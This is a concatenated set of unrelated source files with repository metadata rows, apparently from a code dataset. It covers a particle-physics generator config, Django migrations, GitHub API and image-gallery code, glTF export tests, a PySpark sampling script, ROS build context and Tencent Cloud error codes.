'VCKM(4,1) = 0.01300000D0',
'VCKM(4,2) = 0.04000000D0',
'VCKM(4,3) = 0.41000000D0',
'VCKM(4,4) = 0.91000000D0',
'MDME(66,1)=0 ! g t4',
'MDME(67,1)=0 ! gamma t4',
'KFDP(68,2)=6 ! defines Z0 t (no check)',
'MDME(68,1)=1 ! Z0 t (2 : on for particle, off for anti-particle) ',
'MDME(69,1)=0 ! W d',
'MDME(70,1)=0 ! W s',
'MDME(71,1)=1 ! W b (3 : off for particle, on for particle) ',
'MDME(72,1)=0 ! W b4',
'MDME(73,1)=0 ! h0 t4',
'MDME(74,1)=-1 ! H+ b',
'MDME(75,1)=-1 ! H+ b4',
'BRAT(66) = 0.0D0',
'BRAT(67) = 0.0D0',
'BRAT(68) = 0.5D0',
'BRAT(69) = 0.0D0',
'BRAT(70) = 0.0D0',
'BRAT(71) = 0.5D0',
'BRAT(72) = 0.0D0',
'BRAT(73) = 0.0D0',
'BRAT(74) = 0.0D0',
'BRAT(75) = 0.0D0',
'MDME(174,1)=1 !Z decay into d dbar',
'MDME(175,1)=1 !Z decay into u ubar',
'MDME(176,1)=1 !Z decay into s sbar',
'MDME(177,1)=1 !Z decay into c cbar',
'MDME(178,1)=1 !Z decay into b bbar',
'MDME(179,1)=1 !Z decay into t tbar',
'MDME(180,1)=-1 !Z decay into b4 b4bar',
'MDME(181,1)=-1 !Z decay into t4 t4bar',
'MDME(182,1)=1 !Z decay into e- e+',
'MDME(183,1)=1 !Z decay into nu_e nu_ebar',
'MDME(184,1)=1 !Z decay into mu- mu+',
'MDME(185,1)=1 !Z decay into nu_mu nu_mubar',
'MDME(186,1)=1 !Z decay into tau- tau+',
'MDME(187,1)=1 !Z decay into nu_tau nu_taubar',
'MDME(188,1)=-1 !Z decay into tau4 tau4bar',
'MDME(189,1)=-1 !Z decay into nu_tau4 nu_tau4bar',
'MDME(190,1)=1 !W decay into u dbar',
'MDME(191,1)=1 !W decay into c dbar',
'MDME(192,1)=1 !W decay into t dbar',
'MDME(193,1)=-1 !W decay into t4 dbar',
'MDME(194,1)=1 !W decay into u sbar',
'MDME(195,1)=1 !W decay into c sbar',
'MDME(196,1)=1 !W decay into t sbar',
'MDME(197,1)=-1 !W decay into t4 sbar',
'MDME(198,1)=1 !W decay into u bbar',
'MDME(199,1)=1 !W decay into c bbar',
'MDME(200,1)=1 !W decay into t bbar',
'MDME(201,1)=-1 !W decay into t4 bbar',
'MDME(202,1)=-1 !W decay into u b4bar',
'MDME(203,1)=-1 !W decay into c b4bar',
'MDME(204,1)=-1 !W decay into t b4bar',
'MDME(205,1)=-1 !W decay into t4 b4bar',
'MDME(206,1)=1 !W decay into e- nu_e',
'MDME(207,1)=1 !W decay into mu nu_mu',
'MDME(208,1)=1 !W decay into tau nu_tau',
'MDME(209,1)=-1 !W decay into tau4 nu_tau4'),
# This is a vector of ParameterSet names to be read, in this order
parameterSets = cms.vstring('pythiaUESettings',
'processParameters')
),
jetMatching = cms.untracked.PSet(
scheme = cms.string("Madgraph"),
mode = cms.string("auto"), # soup, or "inclusive" / "exclusive"
MEMAIN_etaclmax = cms.double(5.0),
MEMAIN_qcut = cms.double(-1),
MEMAIN_nqmatch = cms.int32(-1),
MEMAIN_minjets = cms.int32(-1),
MEMAIN_maxjets = cms.int32(-1),
MEMAIN_showerkt = cms.double(0),
MEMAIN_excres = cms.string(''),
outTree_flag = cms.int32(0)
)
)
ProductionFilterSequence = cms.Sequence(generator)
| [
"sha1-5c9a4926c1ea08b633689ec734e2440da58b8c56@cern.ch"
] | sha1-5c9a4926c1ea08b633689ec734e2440da58b8c56@cern.ch |
19c036b8c37c66b0214ccbfc8b7a4c13c90935d2 | 87402fcec35a35a45dc305588323c72fa3d203b0 | /tasks/migrations/0022_auto_20200925_1348.py | 30bef7017d73304f6deadfa32abf64fe1e491aa8 | [] | no_license | Aviemusca/task-manager-backend | d80fd20a5aa88a31f5096d17c3ee1ebe86832c7e | b0a9052d94138f4e7d2c1be7f7425ee570f9eec4 | refs/heads/master | 2022-12-20T10:06:16.648889 | 2020-09-29T10:31:33 | 2020-09-29T10:31:33 | 278,863,723 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | # Generated by Django 3.0.8 on 2020-09-25 13:48
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tasks', '0021_auto_20200907_1043'),
]
operations = [
migrations.AlterField(
model_name='task',
name='deadline',
field=models.DateTimeField(default=datetime.datetime(2020, 10, 2, 13, 47, 57, 676103)),
),
]
| [
"yvan@metatech.ie"
] | yvan@metatech.ie |
9a92c56ebf23abfd32e027a9bee74caebb691d5d | f74dd098c3e665d8f605af5ebe7e2874ac31dd2f | /aiogithubapi/objects/repository/release.py | 61c880ab667788e696a65c262a1162a9b0c98748 | [
"MIT"
] | permissive | ludeeus/aiogithubapi | ce87382698827939aaa127b378b9a11998f13c06 | 90f3fc98e5096300269763c9a5857481b2dec4d2 | refs/heads/main | 2023-08-20T19:30:05.309844 | 2023-08-14T20:24:21 | 2023-08-14T20:24:21 | 198,505,021 | 21 | 20 | MIT | 2023-09-11T06:12:10 | 2019-07-23T20:39:53 | Python | UTF-8 | Python | false | false | 986 | py | """
AIOGitHubAPI: Repository Release
https://developer.github.com/v3/repos/releases/
"""
# pylint: disable=missing-docstring
from datetime import datetime
from ...objects.base import AIOGitHubAPIBase
from ...objects.repository.content import AIOGitHubAPIRepositoryContent
class AIOGitHubAPIRepositoryRelease(AIOGitHubAPIBase):
"""Repository Release GitHub API implementation."""
@property
def tag_name(self):
return self.attributes.get("tag_name")
@property
def name(self):
return self.attributes.get("name")
@property
def published_at(self):
return datetime.strptime(self.attributes.get("published_at"), "%Y-%m-%dT%H:%M:%SZ")
@property
def draft(self):
return self.attributes.get("draft")
@property
def prerelease(self):
return self.attributes.get("prerelease")
@property
def assets(self):
return [AIOGitHubAPIRepositoryContent(x) for x in self.attributes.get("assets", [])]
| [
"noreply@github.com"
] | ludeeus.noreply@github.com |
b961193349a8103c8c431616e1dd217e33b4484d | 0fef5d75b0896116eda121c4d7c8a4ad6686a0f7 | /kotti_image_gallery/views.py | aca92925141697899cbe39251257bae08515e3ba | [] | no_license | disko/kotti_image_gallery | 1144d06f31f3d07f759b73d88a066730bc0ed920 | 046d127effdf3774cf0c1b04f2ef599e6134becb | HEAD | 2016-09-06T05:11:24.588627 | 2012-06-20T09:10:36 | 2012-06-20T09:10:36 | 4,111,810 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,719 | py | # -*- coding: utf-8 -*-
import PIL
from kotti import DBSession
from kotti.util import _
from kotti.views.edit import ContentSchema, make_generic_add, make_generic_edit
from kotti.views.file import AddFileFormView, EditFileFormView
from kotti_image_gallery import image_scales
from kotti_image_gallery.resources import Gallery, Image
from plone.scale.scale import scaleImage
from pyramid.response import Response
from pyramid.view import view_config
PIL.ImageFile.MAXBLOCK = 33554432
class GallerySchema(ContentSchema):
pass
class BaseView(object):
def __init__(self, context, request):
self.context = context
self.request = request
class GalleryView(BaseView):
@view_config(context=Gallery,
name='view',
permission='view',
renderer='templates/gallery-view.pt')
def view(self):
session = DBSession()
query = session.query(Image).filter(Image.parent_id==self.context.id).order_by(Image.position)
images = query.all()
return {"images": images}
class EditImageFormView(EditFileFormView):
pass
class AddImageFormView(AddFileFormView):
item_type = _(u"Image")
def add(self, **appstruct):
buf = appstruct['file']['fp'].read()
return Image(title=appstruct['title'],
description=appstruct['description'],
data=buf,
filename=appstruct['file']['filename'],
mimetype=appstruct['file']['mimetype'],
size=len(buf), )
class ImageView(BaseView):
@view_config(context=Image,
name='view',
permission='view',
renderer='templates/image-view.pt')
def view(self):
return {}
@view_config(context=Image,
name="image",
permission='view')
def image(self):
"""return the image in a specific scale, either inline (default) or as attachment"""
subpath = list(self.request.subpath)
if (len(subpath) > 0) and (subpath[-1] == "download"):
disposition = "attachment"
subpath.pop()
else:
disposition = "inline"
if len(subpath) == 1:
scale = subpath[0]
if scale in image_scales:
# /path/to/image/scale/thumb
width, height = image_scales[scale]
else:
# /path/to/image/scale/160x120
try:
width, height = [int(v) for v in scale.split("x")]
except ValueError:
width, height = (None, None)
elif len(subpath) == 2:
# /path/to/image/scale/160/120
try:
width, height = [int(v) for v in subpath]
except ValueError:
width, height = (None, None)
else:
# don't scale at all
width, height = (None, None)
if width and height:
image, format, size = scaleImage(self.context.data,
width=width,
height=height,
direction="thumb")
else:
image = self.context.data
res = Response(
headerlist=[('Content-Disposition', '%s;filename="%s"' % (disposition,
self.context.filename.encode('ascii', 'ignore'))),
('Content-Length', str(len(image))),
('Content-Type', str(self.context.mimetype)), ],
app_iter=image)
return res
def includeme(config):
config.add_static_view('static-kotti_image_gallery', 'kotti_image_gallery:static')
config.scan("kotti_image_gallery")
config.add_view(AddImageFormView,
name=Image.type_info.add_view,
permission='add',
renderer='kotti:templates/edit/node.pt',)
config.add_view(EditImageFormView,
context=Image,
name='edit',
permission='edit',
renderer='kotti:templates/edit/node.pt', )
config.add_view(make_generic_edit(GallerySchema()),
context=Gallery,
name='edit',
permission='edit',
renderer='kotti:templates/edit/node.pt', )
config.add_view(make_generic_add(GallerySchema(), Gallery),
name=Gallery.type_info.add_view,
permission='add',
renderer='kotti:templates/edit/node.pt', )
| [
"disko@binary-punks.com"
] | disko@binary-punks.com |
a4119ba39b831d8757ef26706cf178071762301f | 9f1a56cbf621b34f539b64e526f00f68423a235a | /zigida/apps/db/accounting/items/migrations/0001_initial.py | ff2e312708e73881e78622e43232fdf8253ba8b9 | [] | no_license | JacobSima/zando | 21d982b190a719982bd5648ac135fbfbe45dbf00 | e6fcac1ce97796d1dea5104f1b73bbf9b8822b98 | refs/heads/main | 2023-06-15T03:51:52.846591 | 2021-07-12T10:52:25 | 2021-07-12T10:52:25 | 385,208,981 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,226 | py | # Generated by Django 3.2.4 on 2021-07-06 15:56
import django.core.validators
from django.db import migrations, models
import uuid
import zigida.core.utils
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Item',
fields=[
('datetime_created', models.DateTimeField(auto_now_add=True, verbose_name='DATE CREATED')),
('datetime_updated', models.DateTimeField(auto_now=True, verbose_name='DATE UPDATED')),
('last_updated_by', models.CharField(blank=True, max_length=50, null=True, verbose_name='LAST UPDATED BY')),
('bool_deleted', models.BooleanField(default=False, verbose_name='IS DELETED?')),
('uuid_code', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, verbose_name='ID')),
('token_key', models.UUIDField(blank=True, default=uuid.uuid4, editable=False, null=True, verbose_name='TOKEN')),
('code', models.CharField(default=zigida.core.utils.item_randcode_gen, max_length=100, verbose_name='CODE')),
('quantity', models.PositiveSmallIntegerField(blank=True, default=1, null=True, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(999)], verbose_name='QUANTITY')),
('price_buy', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE BUY')),
('price_buy_original', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE BUY ORIGINAL')),
('price_sell', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE SELL')),
('price_sell_original', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE SELL ORIGINAL')),
('bool_active', models.BooleanField(default=True, verbose_name='IS ACTIVE')),
],
options={
'verbose_name_plural': 'items',
'db_table': 'items',
},
),
]
| [
"simajacob2011@gmail.com"
] | simajacob2011@gmail.com |
7999c9e767ff7ebde5862e9be1c8e6c2ba746d76 | 0e1e643e864bcb96cf06f14f4cb559b034e114d0 | /Exps_7_v3/doc3d/Ablation3_Pyr_ch016_ep010_noFocus/step10_b1_train.py | 3aaadbfa5d58d8ec98b4c4672a778cf2dced46a2 | [] | no_license | KongBOy/kong_model2 | 33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307 | 1af20b168ffccf0d5293a393a40a9fa9519410b2 | refs/heads/master | 2022-10-14T03:09:22.543998 | 2022-10-06T11:33:42 | 2022-10-06T11:33:42 | 242,080,692 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,653 | py | #############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### 把 kong_model2 加入 sys.path
import os
code_exe_path = os.path.realpath(__file__) ### 目前執行 step10_b.py 的 path
code_exe_path_element = code_exe_path.split("\\") ### 把 path 切分 等等 要找出 kong_model 在第幾層
kong_layer = code_exe_path_element.index("kong_model2") ### 找出 kong_model2 在第幾層
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1]) ### 定位出 kong_model2 的 dir
import sys ### 把 kong_model2 加入 sys.path
sys.path.append(kong_model2_dir)
# print(__file__.split("\\")[-1])
# print(" code_exe_path:", code_exe_path)
# print(" code_exe_path_element:", code_exe_path_element)
# print(" kong_layer:", kong_layer)
# print(" kong_model2_dir:", kong_model2_dir)
###############################################################################################################################################################################################################
# 按F5執行時, 如果 不是在 step10_b.py 的資料夾, 自動幫你切過去~ 才可 import step10_a.py 喔!
code_exe_dir = os.path.dirname(code_exe_path) ### 目前執行 step10_b.py 的 dir
if(os.getcwd() != code_exe_dir): ### 如果 不是在 step10_b.py 的資料夾, 自動幫你切過去~
os.chdir(code_exe_dir)
# print("current_path:", os.getcwd())
###############################################################################################################################################################################################################
### 所有 指令 統一寫這邊
from step10_c_exp_command import *
######################################################################################################################
import subprocess as sb
### I_w_M_to_C 3UNet/wiDiv/woDiv %& FL/FM/NL/NM
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L5__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L5__woD_L__Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L6__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L6__woD_L__Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L7__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L7__woD_L__Full_Less_in_have_bg .{train}"])
### W_w_M_to_C woDiv
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L5__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L5__woD_L__Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L6__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L6__woD_L__Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L7__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L7__woD_L__Full_Less_in_have_bg .{train}"])
##### 一起訓練
### 4. woD_L woD_L(記得 woD_L 的 seperate 要設 False),第二個測這個
# 這個是我意想不到竟然做得更好的結果, 我想看看他可以做得多好
# sb.run(cmd_python_step10_a + [f"exp_L5_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_L5_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_L6_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_L6_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_L7_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_L7_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less_in_have_bg .{train}"])
| [
"s89334roy@yahoo.com.tw"
] | s89334roy@yahoo.com.tw |
6337e2499c6fa0da29ea130222d938fa6a36f58a | 528f910908885c3ded4ecc6380b9603c8dcacbd6 | /tbapi/top/api/rest/SimbaRptCustbaseGetRequest.py | c9d9394a3214923195d5a87283bd2c0146389272 | [] | no_license | Monica-ckd/data007 | 15fe9c4c898a51a58100138b6b064211199d2ed1 | 0e54ae57eb719b86ec14ce9f77b027882a3398a8 | refs/heads/master | 2023-03-16T05:26:14.257318 | 2016-05-25T06:57:05 | 2016-05-25T06:57:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 464 | py | '''
Created by auto_sdk on 2013-04-01 16:44:41
'''
from top.api.base import RestApi
class SimbaRptCustbaseGetRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.end_time = None
self.nick = None
self.page_no = None
self.page_size = None
self.source = None
self.start_time = None
self.subway_token = None
def getapiname(self):
return 'taobao.simba.rpt.custbase.get'
| [
"root@u16392468.onlinehome-server.com"
] | root@u16392468.onlinehome-server.com |
a66ad8b37efa20112165adcc07b03e6251140a84 | 7a5576a22774c8e36830781a845c0ac39243af99 | /tests/unit/test_image.py | e26427a2f2abfd00f2f1968405b9a41875cc1403 | [
"Apache-2.0"
] | permissive | Kupoman/blendergltf | 1ccece9793005c57683baf6cfd50cadb7ff303c0 | cd665283e5fce6447abba22dfd9f584c602a1782 | refs/heads/develop | 2022-07-04T06:04:04.535191 | 2019-06-16T01:32:40 | 2019-06-16T02:21:09 | 51,494,812 | 353 | 60 | Apache-2.0 | 2020-05-30T14:29:18 | 2016-02-11T04:53:55 | Python | UTF-8 | Python | false | false | 2,570 | py | def test_image_export_reference(exporters, state, bpy_image_default, gltf_image_default):
state['settings']['images_data_storage'] = 'REFERENCE'
gltf_image_default['uri'] = '../filepath.png'
output = exporters.ImageExporter.export(state, bpy_image_default)
assert output == gltf_image_default
def test_image_export_embed(exporters, state, bpy_image_default, gltf_image_default):
state['settings']['images_data_storage'] = 'EMBED'
gltf_image_default['uri'] = (
'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACElEQVR42gMAAAAAAW'
'/dyZEAAAAASUVORK5CYII='
)
gltf_image_default['mimeType'] = 'image/png'
output = exporters.ImageExporter.export(state, bpy_image_default)
assert output == gltf_image_default
def test_image_export_embed_glb(exporters, state, bpy_image_default, gltf_image_default):
state['settings']['images_data_storage'] = 'EMBED'
state['settings']['gltf_export_binary'] = True
gltf_image_default['mimeType'] = 'image/png'
gltf_image_default['bufferView'] = 'bufferView_buffer_Image_0'
output = exporters.ImageExporter.export(state, bpy_image_default)
for ref in state['references']:
ref.source[ref.prop] = ref.blender_name
assert output == gltf_image_default
def test_image_to_data_uri(exporters, bpy_image_default):
image_data = (
b'\x89PNG\r\n\x1a\n\x00\x00\x00\r'
b'IHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\x08'
b'IDATx\xda\x03\x00\x00\x00\x00\x01o\xdd\xc9\x91\x00\x00\x00\x00'
b'IEND\xaeB`\x82'
)
assert exporters.ImageExporter.image_to_data_uri(bpy_image_default) == image_data
def test_image_check(exporters, state, bpy_image_default):
assert exporters.ImageExporter.check(state, bpy_image_default)
def test_image_default(exporters, state, bpy_image_default):
assert exporters.ImageExporter.default(state, bpy_image_default) == {
'name': 'Image',
'uri': '',
}
def test_image_check_0_x(exporters, state, bpy_image_default):
bpy_image_default.size = [0, 1]
assert exporters.ImageExporter.check(state, bpy_image_default) is not True
def test_image_check_0_y(exporters, state, bpy_image_default):
bpy_image_default.size = [1, 0]
assert exporters.ImageExporter.check(state, bpy_image_default) is not True
def test_image_check_type(exporters, state, bpy_image_default):
bpy_image_default.type = 'NOT_IMAGE'
assert exporters.ImageExporter.check(state, bpy_image_default) is not True
| [
"kupomail@gmail.com"
] | kupomail@gmail.com |
79609da4ebb7b41e9546575df82cac770fc8e609 | 3c541cf9d6956f580eb6fec039e567d0813ee272 | /apps/recipes/views/recipes.py | 8ea96fb3baf2507cfcc458eceef1f76889e0aaa4 | [] | no_license | NicolasTerroni/MyFridgeAPI | 9c4a7b28f48d9c547b82bc45348a4a2bd58d8551 | 5cd1b3155c4542d0479948f39701b539497e28f7 | refs/heads/main | 2023-07-01T03:05:09.422293 | 2021-08-10T04:10:44 | 2021-08-10T04:10:44 | 382,104,468 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,893 | py | """Recipes views."""
# Django REST Framework
from rest_framework.viewsets import ModelViewSet
from rest_framework.decorators import action
from rest_framework.response import Response
# Serializers
from apps.recipes.serializers import RecipeModelSerializer, CreateRecipeSerializer
# Models
from apps.recipes.models import Recipe
# Permissions
from rest_framework.permissions import IsAuthenticated
from apps.recipes.permissions import IsRecipeOwner
# Utilities
from collections import Counter
class RecipesViewSet(ModelViewSet):
"""Recipes viewset."""
queryset = Recipe.objects.all()
lookup_field = 'slug_name'
def get_permissions(self):
"""Assign permissions based on action."""
permissions = [IsAuthenticated,]
if self.action in ['update','partial_update','destroy']:
permissions.append(IsRecipeOwner)
return [permission() for permission in permissions]
def get_serializer_class(self):
"""Return serializer class based on action."""
if self.action == "create":
return CreateRecipeSerializer
else:
return RecipeModelSerializer
@action(detail=False)
def possible_recipes(self, request):
"""Returns recipes that contain at least one of the ingredients from the user's fridge."""
# Get user fridge's ingredients
fridge_ingredients_queryset = request.user.fridge.ingredients.all()
# Transform the queryset into a list
fridge_ingredients = [i for i in fridge_ingredients_queryset]
# Get recipes that contain at least one of the ingredients from the user's fridge
queryset = Recipe.objects.filter(ingredients__in=fridge_ingredients)
# This will append to the queryset a recipe instance for each ingredient that matches.
# Now order by most repeated recipes in the queryset and remove the repeated recipe instances.
counts = Counter(queryset)
queryset = sorted(counts, key=counts.get, reverse=True)
# Pagination
page = self.paginate_queryset(queryset)
if page is not None:
serializer = self.get_serializer(page, many=True)
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(queryset, many=True)
return Response(serializer.data)
@action(detail=False)
def my_recipes(self, request):
"""List the requesting user recipes."""
queryset = Recipe.objects.filter(created_by=request.user)
# Pagination
page = self.paginate_queryset(queryset)
if page is not None:
serializer = self.get_serializer(page, many=True)
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(queryset, many=True)
return Response(serializer.data) | [
"nsterroni@gmail.com"
] | nsterroni@gmail.com |
be134015a3d29b2e9234fc1baf05fbb8b076fb41 | fcd2ece104f3c5ade822fd8b6ae35e3dd48e35b1 | /code/2-twitter_labor/1-training_data_preparation/preliminary/ngram_labeling/build_set_specificity_check.py | 54d4e9a89780968a89e234a79ce889fe5ec87f76 | [] | no_license | spfraib/twitter | 975742c9090b628ade0ec7230d0a9f09ab6e5d4a | da2104d30d094d5f943a057f5c1df902c2254d4d | refs/heads/master | 2023-06-22T08:37:22.523478 | 2022-12-30T17:49:33 | 2022-12-30T17:49:33 | 236,588,781 | 6 | 4 | null | 2023-06-12T21:28:41 | 2020-01-27T20:34:53 | Jupyter Notebook | UTF-8 | Python | false | false | 1,488 | py | from pyspark.sql import SparkSession
import pyspark.sql.functions as F
from pyspark.ml.feature import Bucketizer, QuantileDiscretizer
from pyspark.sql import Window
from pyspark.sql.types import *
from pyspark.sql.functions import lower, col, lit
import subprocess
import argparse
import os
import unicodedata
import sys
from pyspark.sql.functions import translate, regexp_replace
from pyspark.sql.types import StringType
from pyspark.sql.functions import udf
try:
spark
except NameError:
spark = SparkSession.builder.appName("").getOrCreate()
if __name__ == "__main__":
df_sample_1000 = spark.read.parquet('/user/mt4493/twitter/ngram_samples/US/sample_1000')
df_sample_new_1000 = spark.read.parquet('/user/mt4493/twitter/ngram_samples/US/sample_new_1000')
df = df_sample_1000.union(df_sample_new_1000)
df = df.withColumn('text', regexp_replace('text', '\\', ' '))
dropped_ngrams_list = ['i_fired', 'firedme', 'i_unemployed', 'i_jobless', 'i_not_working']
df = df.filter(~df.ngram.isin(dropped_ngrams_list))
f = df.groupby('ngram').count()
f = f.withColumn('frac', F.when(col('count') < 20, 1).otherwise(20 / col('count')))
frac_dict = dict(f.select('ngram', 'frac').collect())
df_sampled = df.sampleBy('ngram', fractions=frac_dict)
df_sampled = df_sampled.select('tweet_id', 'text', 'ngram')
df_sampled.coalesce(1).write.mode("overwrite").option("header", "true").csv('/user/mt4493/twitter/ngram_samples/US/specificity_check')
| [
"manuel.tonneau@mailbox.org"
] | manuel.tonneau@mailbox.org |
ddbef986dae907d2050b594e370f2184388f1920 | e7c70a02e61f6d4a97c5933f3550bca22afa6acb | /ros_ws/build/learning_ros/Part_1/custom_msgs/cmake/custom_msgs-genmsg-context.py | cdf5cb754534d19022baa9bb108ca94f21ca075e | [] | no_license | amitf82/Final_Proj_Mobile_Robotics | 14cfe7b182df1294a873283c91688c8ca9526fee | 435a6c1562df030fc462fe1b0a84f968a27a2b85 | refs/heads/master | 2021-01-20T03:22:51.387095 | 2017-04-30T08:25:33 | 2017-04-30T08:25:33 | 89,532,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | # generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/home/user/ros_ws/src/learning_ros/Part_1/custom_msgs/msg/VecOfDoubles.msg"
services_str = ""
pkg_name = "custom_msgs"
dependencies_str = "roscpp;std_msgs"
langs = "gencpp;genlisp;genpy"
dep_include_paths_str = "custom_msgs;/home/user/ros_ws/src/learning_ros/Part_1/custom_msgs/msg;roscpp;/opt/ros/indigo/share/roscpp/cmake/../msg;std_msgs;/opt/ros/indigo/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/indigo/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| [
"adf38@case.edu"
] | adf38@case.edu |
f69ccb7f33652833c315b76a7a2d83e1524f1e29 | 4dfd539c530c5cff6874f2fa0c06ffd893212ad3 | /tencentcloud/yunjing/v20180228/errorcodes.py | c9d51af5bf9ec25e5d48a99b9a144f01510b9ba7 | [] | no_license | TencentCloud/tencentcloud-sdk-python-intl-en | aac605d1a0458b637ba29eb49f6f166fe844a269 | 042b4d7fb609d4d240728197901b46008b35d4b0 | refs/heads/master | 2023-09-01T19:39:27.436454 | 2023-09-01T04:02:15 | 2023-09-01T04:02:15 | 227,834,644 | 4 | 6 | null | 2023-07-17T08:56:56 | 2019-12-13T12:23:52 | Python | UTF-8 | Python | false | false | 3,195 | py | # -*- coding: utf8 -*-
# Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# The agent is offline.
FAILEDOPERATION_AGENTOFFLINE = 'FailedOperation.AgentOffline'
# Failed to deactivate CWP Pro.
FAILEDOPERATION_CLOSEPROVERSION = 'FailedOperation.CloseProVersion'
# Failed to create a port acquisition task.
FAILEDOPERATION_CREATEOPENPORTTASK = 'FailedOperation.CreateOpenPortTask'
# Failed to create a real-time process acquisition task.
FAILEDOPERATION_CREATEPROCESSTASK = 'FailedOperation.CreateProcessTask'
# Failed to export.
FAILEDOPERATION_EXPORT = 'FailedOperation.Export'
# The server was uninstalled.
FAILEDOPERATION_MACHINEDELETE = 'FailedOperation.MachineDelete'
# The real-time port pulling task does not exist.
FAILEDOPERATION_OPENPORTTASKNOTFOUND = 'FailedOperation.OpenPortTaskNotFound'
# Failed to activate CWP Pro.
FAILEDOPERATION_OPENPROVERSION = 'FailedOperation.OpenProVersion'
# Failed to isolate all or part of servers.
FAILEDOPERATION_PARTSEPARATE = 'FailedOperation.PartSeparate'
# Unable to disable the prepaid Pro edition. Please disable it in Billing Center.
FAILEDOPERATION_PREPAYMODE = 'FailedOperation.PrePayMode'
# The real-time process pulling task does not exist.
FAILEDOPERATION_PROCESSTASKNOTFOUND = 'FailedOperation.ProcessTaskNotFound'
# Failed to recover the trojan.
FAILEDOPERATION_RECOVER = 'FailedOperation.Recover'
# Failed to scan for vulnerabilities again.
FAILEDOPERATION_RESCANVUL = 'FailedOperation.RescanVul'
# The server already has a rescan task in progress.
FAILEDOPERATION_RESCANVULPROCESSINUSE = 'FailedOperation.RescanVulProcessInUse'
# Failed to isolate a single server.
FAILEDOPERATION_SINGLESEPARATE = 'FailedOperation.SingleSeparate'
# Internal error.
INTERNALERROR = 'InternalError'
# The time range format is incorrect.
INVALIDPARAMETER_DATERANGE = 'InvalidParameter.DateRange'
# Invalid request.
INVALIDPARAMETER_ILLEGALREQUEST = 'InvalidParameter.IllegalRequest'
# Incorrect parameter format.
INVALIDPARAMETER_INVALIDFORMAT = 'InvalidParameter.InvalidFormat'
# Missing parameter.
INVALIDPARAMETER_MISSINGPARAMETER = 'InvalidParameter.MissingParameter'
# Parameter parsing error.
INVALIDPARAMETER_PARSINGERROR = 'InvalidParameter.ParsingError'
# The tag name cannot contain more than 15 characters.
